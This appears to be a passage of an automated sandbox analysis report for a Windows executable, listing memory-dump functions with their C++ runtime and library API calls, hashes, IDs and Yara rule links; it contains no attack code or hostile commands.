                                                                                                                                                        • Opcode Fuzzy Hash: bff3102cd36f89475c7076a14a4253b765cebc1db8b479a6b9190f7bd35a292b
                                                                                                                                                        • Instruction Fuzzy Hash: D401E531D0021A9BCF01FB60D80AABD777ABF84360F54855EF5086B291DF389D029794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0057E127, Relevance: 10.6, APIs: 7, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0057E12E
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0057E138
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0057E158
                                                                                                                                                        • messages.LIBCPMT ref: 0057E172
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0057E18F
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0057E1AE
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0057E1B7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmessagesstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2194591311-0
                                                                                                                                                        • Opcode ID: 52ab5622337a358df0babbadd18395f18a651ffcffad69cadbdeeecbeb785447
                                                                                                                                                        • Instruction ID: 047497067f58eec9273fa767a97950f460d0aed1d77930752b00b516c8413c21
                                                                                                                                                        • Opcode Fuzzy Hash: 52ab5622337a358df0babbadd18395f18a651ffcffad69cadbdeeecbeb785447
                                                                                                                                                        • Instruction Fuzzy Hash: DF01E131E0011A9BCF01FF60E84AAAD7B3ABF84720F94811EE5146B292DF389D02D795
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0057E1C4, Relevance: 10.6, APIs: 7, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0057E1CB
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0057E1D5
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0057E1F5
                                                                                                                                                        • messages.LIBCPMT ref: 0057E20F
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0057E22C
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0057E24B
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0057E254
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmessagesstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2194591311-0
                                                                                                                                                        • Opcode ID: 0eadd20b1677f4ccf12f07e2d7c989ef2a08c880c08c600e193c4bf171ede939
                                                                                                                                                        • Instruction ID: 8d2846f454c9663139101262886eb8a7b6c6ccaca8f0ae43900d3bd3bd8cc8c9
                                                                                                                                                        • Opcode Fuzzy Hash: 0eadd20b1677f4ccf12f07e2d7c989ef2a08c880c08c600e193c4bf171ede939
                                                                                                                                                        • Instruction Fuzzy Hash: EF010835E0021A9BCF01FB60D816ABD7B7ABF84310F54815EE5157B292DF389D029794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0057E4D5, Relevance: 10.6, APIs: 7, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0057E4DC
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0057E4E6
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0057E506
                                                                                                                                                        • moneypunct.LIBCPMT ref: 0057E520
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0057E53D
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0057E55C
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0057E565
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmoneypunctstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3858443405-0
                                                                                                                                                        • Opcode ID: f2125506a4ffe25c07bf358dd69128ab028345a80e221b5b8bc945740ad03764
                                                                                                                                                        • Instruction ID: 88309617e5c093fbed976cfc0cdef2d761d7d6c2dbf7e41b549c7a3bdb78ad38
                                                                                                                                                        • Opcode Fuzzy Hash: f2125506a4ffe25c07bf358dd69128ab028345a80e221b5b8bc945740ad03764
                                                                                                                                                        • Instruction Fuzzy Hash: 3901E535D0011E9BCF01FB60E806ABD7736BF84764F54811EE5056B291DF389E029794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0057E572, Relevance: 10.6, APIs: 7, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0057E579
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0057E583
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0057E5A3
                                                                                                                                                        • moneypunct.LIBCPMT ref: 0057E5BD
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0057E5DA
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0057E5F9
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0057E602
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmoneypunctstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3858443405-0
                                                                                                                                                        • Opcode ID: c5b6d9dccf736c8a035f961a29f3556a0a20ba2950f352b4c81c110a8c4bf686
                                                                                                                                                        • Instruction ID: c28f0c74d9639050ca7155126b0ad27aeee20a1f50ff4bfa7ec981bf77a62a37
                                                                                                                                                        • Opcode Fuzzy Hash: c5b6d9dccf736c8a035f961a29f3556a0a20ba2950f352b4c81c110a8c4bf686
                                                                                                                                                        • Instruction Fuzzy Hash: E301C871D0012A9BCF01FB60D856ABD777ABF84364F54811EE5096B291EF389D029794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0057E60F, Relevance: 10.6, APIs: 7, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0057E616
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0057E620
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0057E640
                                                                                                                                                        • moneypunct.LIBCPMT ref: 0057E65A
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0057E677
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0057E696
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0057E69F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmoneypunctstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3858443405-0
                                                                                                                                                        • Opcode ID: d689359e71541942a44ce1041146d3737dbd5edf3f8ff2a9fe8b7e22968ce645
                                                                                                                                                        • Instruction ID: cb91173c225a63c3d1685be69aa7d05cdd50c0691a2646420f36cdd4883eaf5f
                                                                                                                                                        • Opcode Fuzzy Hash: d689359e71541942a44ce1041146d3737dbd5edf3f8ff2a9fe8b7e22968ce645
                                                                                                                                                        • Instruction Fuzzy Hash: C601D671E0021A9BCF01FB60E84AAFD7B76BF94720F54815EF5186B291DF389D029B94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0057E6AC, Relevance: 10.6, APIs: 7, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0057E6B3
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0057E6BD
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0057E6DD
                                                                                                                                                        • moneypunct.LIBCPMT ref: 0057E6F7
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0057E714
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0057E733
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0057E73C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmoneypunctstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3858443405-0
                                                                                                                                                        • Opcode ID: ab50e3c0b36100edb4afebd73e6c2586acf3c47fcf684ac1a8a1f0a3d7ee3f4b
                                                                                                                                                        • Instruction ID: a17168550a96c2339a8356dc3d9be866e043e479a6961a78349c04047bd62c52
                                                                                                                                                        • Opcode Fuzzy Hash: ab50e3c0b36100edb4afebd73e6c2586acf3c47fcf684ac1a8a1f0a3d7ee3f4b
                                                                                                                                                        • Instruction Fuzzy Hash: 8001E131E0021A9BCF05FB60E84AABD7B3ABF94720F54811EF5046B291DF389D029794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0057E9BD, Relevance: 10.6, APIs: 7, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0057E9C4
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0057E9CE
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0057E9EE
                                                                                                                                                        • numpunct.LIBCPMT ref: 0057EA08
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0057EA25
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0057EA44
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0057EA4D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrownumpunctstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 639073845-0
                                                                                                                                                        • Opcode ID: bc2fe83b55dcce0b7a98caeb91eddacc94b03b6b3f63961b636b0cedccda3a50
                                                                                                                                                        • Instruction ID: 31ed021203bc483472f10fc28317c2f047fe65571de112c8228c6646113e889e
                                                                                                                                                        • Opcode Fuzzy Hash: bc2fe83b55dcce0b7a98caeb91eddacc94b03b6b3f63961b636b0cedccda3a50
                                                                                                                                                        • Instruction Fuzzy Hash: 3A01A532D0011A9BCF05FBA0D80AAED7B7ABF94350F58411EE5056B291DF389D019794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0057EA5A, Relevance: 10.6, APIs: 7, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0057EA61
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0057EA6B
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0057EA8B
                                                                                                                                                        • numpunct.LIBCPMT ref: 0057EAA5
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0057EAC2
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0057EAE1
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0057EAEA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrownumpunctstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 639073845-0
                                                                                                                                                        • Opcode ID: 5f3a6ca0f109a23bbf506608d269f2f6674ee4165468dfffcb29ee799f5c00f6
                                                                                                                                                        • Instruction ID: 9870d01b33c97e0511278d34731fd3073b369277aacee534625e06cfa7c0167f
                                                                                                                                                        • Opcode Fuzzy Hash: 5f3a6ca0f109a23bbf506608d269f2f6674ee4165468dfffcb29ee799f5c00f6
                                                                                                                                                        • Instruction Fuzzy Hash: C9018E32E0021A9BCF05FB60D80AAAE7B76BF94760F54851EF504AB291DF389D029794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0058B0EA, Relevance: 10.6, APIs: 7, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0058B0F1
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0058B0FB
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0058B11B
                                                                                                                                                        • messages.LIBCPMT ref: 0058B135
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0058B152
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0058B171
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0058B17A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmessagesstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2194591311-0
                                                                                                                                                        • Opcode ID: 8236f83233b29609ce0ee198a9a45230ea11b10a3a8dc77367c480577f0174a1
                                                                                                                                                        • Instruction ID: f855589eea8cb30b6036de76e21f6830e7013f9eb81f76f71ab1aebc7c198e45
                                                                                                                                                        • Opcode Fuzzy Hash: 8236f83233b29609ce0ee198a9a45230ea11b10a3a8dc77367c480577f0174a1
                                                                                                                                                        • Instruction Fuzzy Hash: 95017C36E0011A9BDF01FBA0981AAFD7B6ABF94750F54411AE9147B291DF389E02C794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0058B2C1, Relevance: 10.6, APIs: 7, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0058B2C8
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0058B2D2
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0058B2F2
                                                                                                                                                        • moneypunct.LIBCPMT ref: 0058B30C
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0058B329
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0058B348
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0058B351
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmoneypunctstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3858443405-0
                                                                                                                                                        • Opcode ID: 8854b604ca6b74805c9a34aee64ae5b8d5cd05f0ebf7ff336ced0e887a62011f
                                                                                                                                                        • Instruction ID: 20d596d0470a181b410cc875016517742053646c3adf8cb7f58fd7df68b73302
                                                                                                                                                        • Opcode Fuzzy Hash: 8854b604ca6b74805c9a34aee64ae5b8d5cd05f0ebf7ff336ced0e887a62011f
                                                                                                                                                        • Instruction Fuzzy Hash: F301CE32E0012A9BDF05FB60D806AAD7B7ABF90320F54450EE9147B291DF389D028794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0058B35E, Relevance: 10.6, APIs: 7, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0058B365
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0058B36F
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0058B38F
                                                                                                                                                        • moneypunct.LIBCPMT ref: 0058B3A9
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0058B3C6
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0058B3E5
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0058B3EE
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmoneypunctstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3858443405-0
                                                                                                                                                        • Opcode ID: 1e8b052c9f1afa820f9f0f1f374cb13e49e658d26e275582416b0ece4898315e
                                                                                                                                                        • Instruction ID: 0f4083e580389b9e603a1426d680b47046457926f59966b16f7ff63611f1bcc1
                                                                                                                                                        • Opcode Fuzzy Hash: 1e8b052c9f1afa820f9f0f1f374cb13e49e658d26e275582416b0ece4898315e
                                                                                                                                                        • Instruction Fuzzy Hash: ED01C431E0011A9BDF01FBA0DC5AABD7B7ABF84360F64451EE9147B291DF389E028794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041078B, Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 41COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: Already open$Element not found$End of file$The descriptor does not fit into the select call's fd_set$asio.misc error
                                                                                                                                                        • API String ID: 3519838083-1489422305
                                                                                                                                                        • Opcode ID: 70c0e2452278dc936b64e8b947f716c18c0678518faf964aa817d85a2e9e5a4a
                                                                                                                                                        • Instruction ID: cb9f38fdeb8afb4d419c4074bdfd119590e640fb98ae427e1c46fdaf524236c4
                                                                                                                                                        • Opcode Fuzzy Hash: 70c0e2452278dc936b64e8b947f716c18c0678518faf964aa817d85a2e9e5a4a
                                                                                                                                                        • Instruction Fuzzy Hash: 06F0A471B40118EA9B24DF55E9418EFB765FB54B20F10441BF915E3680CAB86DC18F8A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00425623, Relevance: 9.2, APIs: 6, Instructions: 235COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00425628
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 0042563F
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00425788
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 004257ED
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 0042581E
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 004258AC
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Enter$Leave$H_prolog
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3611688910-0
                                                                                                                                                        • Opcode ID: c2e07bd3a5986b34029d637bda3c5bbbf0d7292fe6ffbc331e621f02b31f2def
                                                                                                                                                        • Instruction ID: 056df3c0d2eb9cffcb813a6982c779101f017de6dde85cdf84c195aa0b9c8f57
                                                                                                                                                        • Opcode Fuzzy Hash: c2e07bd3a5986b34029d637bda3c5bbbf0d7292fe6ffbc331e621f02b31f2def
                                                                                                                                                        • Instruction Fuzzy Hash: D991DD71A01A15DFCB20DF68D484AAEB7F5FF88310F54451EE49AA7241CB38A905CBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004AB1AB, Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 337COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: GetType() == kNumberType$IsArray()$IsObject()$m->name.IsString()
                                                                                                                                                        • API String ID: 3519838083-2893571818
                                                                                                                                                        • Opcode ID: d5918e2c8f9cecc33dec54a38af6190da608ed72b7f2acf2e5d654321892bab4
                                                                                                                                                        • Instruction ID: 5c0636d0d6f2ca02896b5ae5941689dd9ff9a56bdd396e94014fae6496626045
                                                                                                                                                        • Opcode Fuzzy Hash: d5918e2c8f9cecc33dec54a38af6190da608ed72b7f2acf2e5d654321892bab4
